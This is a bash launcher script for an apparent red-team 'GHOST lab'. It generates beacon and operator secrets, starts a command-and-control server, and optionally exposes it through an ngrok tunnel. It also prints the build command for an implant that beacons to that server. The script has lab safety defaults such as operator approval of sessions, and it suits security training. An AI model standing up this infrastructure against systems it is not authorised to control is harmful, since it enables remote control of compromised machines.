#!/usr/bin/env bash
# simpleserver.sh — one command to bring the GHOST lab up.
#
#   ./simpleserver.sh                 # up, foreground (Ctrl-C stops everything)
#   ./simpleserver.sh up -d           # up, detached (then use: status / logs / down)
#   ./simpleserver.sh up --ngrok      # also start an ngrok tunnel and print its host
#   ./simpleserver.sh up --auto-accept
#   ./simpleserver.sh status          # PID + /health + session count
#   ./simpleserver.sh logs [-f]       # tail the server log
#   ./simpleserver.sh down            # stop server (and tunnel)
#   ./simpleserver.sh reset [--yes]   # delete lab state (database), keep tokens
#
# What it wires up, so nothing has to be remembered between lab sessions:
#   * server/lab/lab.env   — beacon/operator/dashboard secrets, generated once,
#                            chmod 600, reused on later runs (the implant build
#                            must use the beacon token from here)
#   * server/lab/ghost.db  — the SQLite store, so sessions, results and the
#                            audit trail survive a restart
#   * server/lab/*.log     — server + tunnel logs
#
# Safety defaults: no --auto-accept (sessions wait for operator approval),
# tokens are generated per lab and never shared, and reset asks before deleting.
set -euo pipefail

ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
LAB_DIR="${GHOST_LAB_DIR:-$ROOT/server/lab}"
LAB_ENV="$LAB_DIR/lab.env"
DB="$LAB_DIR/ghost.db"
LOG="$LAB_DIR/server.log"
PIDFILE="$LAB_DIR/server.pid"
NGROK_PIDFILE="$LAB_DIR/ngrok.pid"
NGROK_LOG="$LAB_DIR/ngrok.log"

PORT="${GHOST_UP_PORT:-8080}"
HOST="${GHOST_UP_HOST:-0.0.0.0}"
PY="${GHOST_PYTHON:-python3}"

C_G=$'\033[92m'; C_Y=$'\033[93m'; C_R=$'\033[91m'; C_C=$'\033[96m'; C_D=$'\033[90m'; C_0=$'\033[0m'
say()  { printf '%s\n' "$*"; }
ok()   { printf '%s\n' "${C_G}$*${C_0}"; }
warn() { printf '%s\n' "${C_Y}$*${C_0}"; }
die()  { printf '%s\n' "${C_R}[!] $*${C_0}" >&2; exit 1; }

command -v "$PY" >/dev/null 2>&1 || die "$PY not found (set GHOST_PYTHON, or install Python 3.10+)"

usage() { sed -n '2,17p' "${BASH_SOURCE[0]}" | sed 's/^# \{0,1\}//'; }

# ── helpers ──────────────────────────────────────────────────────────────────
gen_secret() { "$PY" -c "import secrets,sys; print(secrets.token_hex(int(sys.argv[1])))" "$1"; }

ensure_env() {
    mkdir -p "$LAB_DIR"
    if [[ ! -f "$LAB_ENV" ]]; then
        umask 177
        cat > "$LAB_ENV" <<EOF
# Generated by simpleserver.sh $(date -u +%Y-%m-%dT%H:%M:%SZ) — lab secrets, do not commit.
GHOST_BEACON_TOKEN=$(gen_secret 32)
GHOST_OPERATOR_TOKEN=$(gen_secret 24)
GHOST_DASHBOARD_USER=admin
GHOST_DASHBOARD_PASS=$(gen_secret 12)
EOF
        chmod 600 "$LAB_ENV" 2>/dev/null || true
        warn "[*] Generated lab secrets -> $LAB_ENV (kept across runs)"
    fi
    # shellcheck disable=SC1090
    set -a; . "$LAB_ENV"; set +a
    [[ -n "${GHOST_BEACON_TOKEN:-}" && -n "${GHOST_OPERATOR_TOKEN:-}" ]] \
        || die "$LAB_ENV is missing tokens — delete it and re-run to regenerate"
}

check_deps() {
    local want_install="${1:-0}"
    if "$PY" -c "import flask, cryptography" >/dev/null 2>&1; then return 0; fi
    if [[ "$want_install" == "1" ]]; then
        say "[*] Installing server dependencies…"
        # pyOpenSSL alongside the runtime deps: the launcher prefers HTTPS, and
        # the implant only speaks it.
        "$PY" -m pip install -q -r "$ROOT/server/requirements.txt" pyOpenSSL \
            || die "pip install failed — run: $PY -m pip install -r server/requirements.txt pyOpenSSL"
        return 0
    fi
    die "missing Python deps. Run: $PY -m pip install -r server/requirements.txt   (or: $0 up --install)"
}

have_tls() { "$PY" -c "import OpenSSL" >/dev/null 2>&1; }

# Liveness and termination go through one helper: on Windows os.kill(pid, 0) is
# NOT a probe — it calls TerminateProcess, so a "is it running?" check would
# have killed the server. OpenProcess + GetExitCodeProcess is the read-only way.
pid_alive() {
    [[ -n "${1:-}" ]] && "$PY" - "$1" <<'PY' | grep -q alive
import ctypes, os, sys
pid = int(sys.argv[1])
if os.name == "nt":
    k = ctypes.windll.kernel32
    h = k.OpenProcess(0x1000 | 0x00100000, False, pid)   # QUERY_LIMITED_INFORMATION | SYNCHRONIZE
    if not h:
        sys.exit(0)
    code = ctypes.c_ulong()
    ok = k.GetExitCodeProcess(h, ctypes.byref(code))
    k.CloseHandle(h)
    if ok and code.value == 259:                          # STILL_ACTIVE
        print("alive")
else:
    try:
        os.kill(pid, 0)
        print("alive")
    except OSError:
        pass
PY
}

read_pid() { [[ -f "$1" ]] && tr -d ' \r\n' < "$1" || true; }

kill_pid() {
    "$PY" - "$1" <<'PY'
import os, signal, sys, time
pid = int(sys.argv[1])

def alive():
    try:
        os.kill(pid, 0)
        return True
    except OSError:
        return False

if os.name == "nt":
    # os.kill with any signal other than CTRL_* is TerminateProcess; a hard stop
    # is fine here because the store commits every write.
    try:
        os.kill(pid, signal.SIGTERM)
    except OSError:
        sys.exit(3)
    sys.exit(0)

try:
    os.kill(pid, signal.SIGTERM)
except OSError:
    sys.exit(3)
for _ in range(50):
    time.sleep(0.2)
    if not alive():
        sys.exit(0)
try:
    os.kill(pid, signal.SIGKILL)
except OSError:
    pass
PY
}

probe() {  # prints "<scheme> <status> <sessions>" or nothing
    "$PY" - "$PORT" <<'PY'
import json, ssl, sys, urllib.request
port = sys.argv[1]
ctx = ssl._create_unverified_context()
for scheme in ("https", "http"):
    try:
        with urllib.request.urlopen(f"{scheme}://127.0.0.1:{port}/health",
                                    timeout=3, context=ctx) as r:
            body = json.loads(r.read())
        print(scheme, body.get("status", "?"), body.get("sessions", "?"))
        sys.exit(0)
    except Exception:
        continue
sys.exit(1)
PY
}

spawn_detached() {  # logfile pidfile cmd...
    local log="$1" pidfile="$2"; shift 2
    "$PY" - "$log" "$pidfile" "$@" <<'PY'
import os, subprocess, sys
log, pidfile, cmd = sys.argv[1], sys.argv[2], sys.argv[3:]
kwargs = {}
if os.name == "nt":
    kwargs["creationflags"] = 0x00000008 | 0x00000200   # DETACHED_PROCESS | NEW_PROCESS_GROUP
else:
    kwargs["start_new_session"] = True
with open(log, "ab") as fh:
    proc = subprocess.Popen(cmd, stdout=fh, stderr=fh, stdin=subprocess.DEVNULL, **kwargs)
with open(pidfile, "w") as fh:
    fh.write(str(proc.pid))
print(proc.pid)
PY
}

ngrok_url() {
    "$PY" - <<'PY'
import json, urllib.request
try:
    with urllib.request.urlopen("http://127.0.0.1:4040/api/tunnels", timeout=3) as r:
        for t in json.loads(r.read()).get("tunnels", []):
            if t.get("public_url", "").startswith("https://"):
                print(t["public_url"]); break
except Exception:
    pass
PY
}

print_brief() {  # $1 = scheme, $2 = public host or "", $3 = ngrok used
    local scheme="$1" pub="$2" used_ngrok="$3"
    local local_url="${scheme}://localhost:${PORT}"
    local c2_hostport c2_host c2_port
    if [[ -n "$pub" ]]; then
        c2_host="${pub#https://}"; c2_host="${c2_host%%/*}"; c2_port=443
    else
        c2_host="<this host>"; c2_port="$PORT"
    fi
    say ""
    ok  "  ── GHOST lab is up ──────────────────────────────────────"
    say "  Dashboard : ${C_C}${local_url}/${C_0}"
    say "  Store     : ${DB}"
    say "  Log       : ${LOG}"
    [[ -n "$pub" ]] && say "  Tunnel    : ${C_C}${pub}${C_0}"
    say ""
    say "  Operator CLI:"
    say "    ${PY} server/c2_cli.py --url ${local_url} --token ${GHOST_OPERATOR_TOKEN}"
    say ""
    say "  Build the implant against this server:"
    say "    C2_HOST=${c2_host} C2_PORT=${c2_port} \\"
    say "      GHOST_BEACON_TOKEN=${GHOST_BEACON_TOKEN} ./build.sh"
    say ""
    [[ "$used_ngrok" == "1" && -z "$pub" ]] && \
        warn "  [!] ngrok is starting; re-run '$0 status' for its public URL."
    return 0
}

# ── subcommands ──────────────────────────────────────────────────────────────
cmd_up() {
    local detach=0 ngrok=0 auto=0 install=0
    for a in "$@"; do
        case "$a" in
            -d|--detach)      detach=1 ;;
            --ngrok)          ngrok=1 ;;
            --auto-accept)    auto=1 ;;
            --install)        install=1 ;;
            -h|--help)        usage; exit 0 ;;
            *) die "unknown option for up: $a" ;;
        esac
    done
    [[ "${GHOST_NGROK:-0}" == "1" ]] && ngrok=1
    [[ "${GHOST_UP_INSTALL:-0}" == "1" ]] && install=1

    ensure_env
    check_deps "$install"

    local tls_args=() scheme=http
    if have_tls; then tls_args+=(--tls); scheme=https; else
        warn "[!] pyOpenSSL missing: serving plain HTTP. The implant speaks HTTPS only,"
        warn "    so pair this with an HTTPS front (ngrok) or: $PY -m pip install pyOpenSSL"
        [[ "$ngrok" == "1" ]] || warn "    Without either, the implant cannot reach this server."
    fi
    [[ "$auto" == "1" ]] && tls_args+=(--auto-accept)

    local ngrok_pid="" pub=""
    if [[ "$ngrok" == "1" ]]; then
        command -v ngrok >/dev/null 2>&1 || die "ngrok not found in PATH (install it or drop --ngrok)"
    fi

    if [[ "$detach" == "1" ]]; then
        if pid_alive "$(read_pid "$PIDFILE")"; then
            die "server already running (pid $(read_pid "$PIDFILE")) — use '$0 status' or '$0 down'"
        fi
        spawn_detached "$LOG" "$PIDFILE" "$PY" "$ROOT/server/c2_server.py" \
            --host "$HOST" --port "$PORT" --db "$DB" \
            --beacon-token "$GHOST_BEACON_TOKEN" --operator-token "$GHOST_OPERATOR_TOKEN" \
            --user "$GHOST_DASHBOARD_USER" --password "$GHOST_DASHBOARD_PASS" \
            "${tls_args[@]}" >/dev/null
        say "[*] server pid $(read_pid "$PIDFILE") — waiting for /health…"
        local i
        for i in $(seq 1 40); do
            probe >/dev/null 2>&1 && break
            sleep 0.5
        done
        if ! probe >/dev/null 2>&1; then
            warn "[!] /health did not answer — check $LOG"
            tail -n 20 "$LOG" 2>/dev/null || true
            exit 1
        fi
        if [[ "$ngrok" == "1" ]]; then
            spawn_detached "$NGROK_LOG" "$NGROK_PIDFILE" ngrok http "$PORT" --log stdout >/dev/null
            for i in $(seq 1 20); do
                pub="$(ngrok_url)"; [[ -n "$pub" ]] && break
                sleep 0.5
            done
        fi
        say "[*] server log: $LOG (follow with: $0 logs -f)"
        print_brief "$scheme" "$pub" "$ngrok"
    else
        if pid_alive "$(read_pid "$PIDFILE")"; then
            die "server already running detached (pid $(read_pid "$PIDFILE")) — '$0 down' first"
        fi
        local cleanup=''
        if [[ "$ngrok" == "1" ]]; then
            spawn_detached "$NGROK_LOG" "$NGROK_PIDFILE" ngrok http "$PORT" --log stdout >/dev/null
            cleanup="ngrok"
            local i
            for i in $(seq 1 20); do pub="$(ngrok_url)"; [[ -n "$pub" ]] && break; sleep 0.5; done
        fi
        print_brief "$scheme" "$pub" "$ngrok"
        say "${C_D}  Ctrl-C stops the server$([[ -n "$cleanup" ]] && printf ' and the tunnel').${C_0}"
        say ""
        # tee keeps the log for `logs`, while the operator sees output live.
        set +e
        "$PY" "$ROOT/server/c2_server.py" --host "$HOST" --port "$PORT" --db "$DB" \
            --beacon-token "$GHOST_BEACON_TOKEN" --operator-token "$GHOST_OPERATOR_TOKEN" \
            --user "$GHOST_DASHBOARD_USER" --password "$GHOST_DASHBOARD_PASS" \
            "${tls_args[@]}" 2>&1 | tee -a "$LOG" >/dev/null
        set -e
        if [[ -n "$cleanup" ]]; then
            local npid; npid="$(read_pid "$NGROK_PIDFILE")"
            pid_alive "$npid" && kill_pid "$npid" >/dev/null 2>&1 || true
            rm -f "$NGROK_PIDFILE"
        fi
        say "[*] server stopped"
    fi
}

cmd_down() {
    local stopped=0
    for pf in "$PIDFILE" "$NGROK_PIDFILE"; do
        local pid; pid="$(read_pid "$pf")"
        if pid_alive "$pid"; then
            if kill_pid "$pid" >/dev/null 2>&1; then
                ok "[+] stopped $(basename "$pf" .pid) (pid $pid)"; stopped=1
            else
                warn "[!] could not stop pid $pid (started in another session?)"
            fi
        fi
        rm -f "$pf"
    done
    [[ "$stopped" == "1" ]] || say "[*] nothing was running"
}

cmd_status() {
    ensure_env
    local pid; pid="$(read_pid "$PIDFILE")"
    if pid_alive "$pid"; then ok "[+] server processes: pid $pid"; else warn "[-] server not running"; fi
    local p; p="$(probe 2>/dev/null || true)"
    if [[ -n "$p" ]]; then
        ok "[+] /health: $(echo "$p" | awk '{print $2}') — sessions: $(echo "$p" | awk '{print $3}')"
    else
        warn "[-] /health did not answer on port $PORT"
    fi
    local np; np="$(read_pid "$NGROK_PIDFILE")"
    if pid_alive "$np"; then
        local u; u="$(ngrok_url)"
        if [[ -n "$u" ]]; then ok "[+] tunnel: $u"; else warn "[*] ngrok pid $np, public URL not ready"; fi
    fi
    [[ -f "$DB" ]] && say "    store: $DB ($(du -h "$DB" 2>/dev/null | cut -f1))"
}

cmd_logs() {
    [[ -f "$LOG" ]] || die "no log yet at $LOG"
    if [[ "${1:-}" == "-f" ]]; then tail -n 50 -f "$LOG"; else tail -n 200 "$LOG"; fi
}

cmd_reset() {
    local yes=0
    [[ "${1:-}" == "--yes" || "${1:-}" == "-y" ]] && yes=1
    local pid; pid="$(read_pid "$PIDFILE")"
    if pid_alive "$pid"; then
        [[ "$yes" == "1" ]] || die "server is running — '$0 down' first (or pass --yes)"
        cmd_down
    fi
    say "This deletes the lab database (sessions, results, audit trail, staged payload)."
    say "Tokens in $LAB_ENV are kept."
    if [[ "$yes" != "1" ]]; then
        read -rp "Delete $DB? [y/N] " a || a=""
        [[ "$a" == "y" || "$a" == "Y" ]] || { say "[*] aborted"; return 0; }
    fi
    rm -f "$DB" "$DB-wal" "$DB-shm"
    ok "[+] lab state cleared"
}

# ── dispatch ─────────────────────────────────────────────────────────────────
case "${1:-up}" in
    up)     shift || true; cmd_up "$@" ;;
    down)   cmd_down ;;
    status) cmd_status ;;
    logs)   shift || true; cmd_logs "$@" ;;
    reset)  shift || true; cmd_reset "$@" ;;
    -h|--help|help) usage ;;
    *)      die "unknown command: $1 (try: up | down | status | logs | reset)" ;;
esac
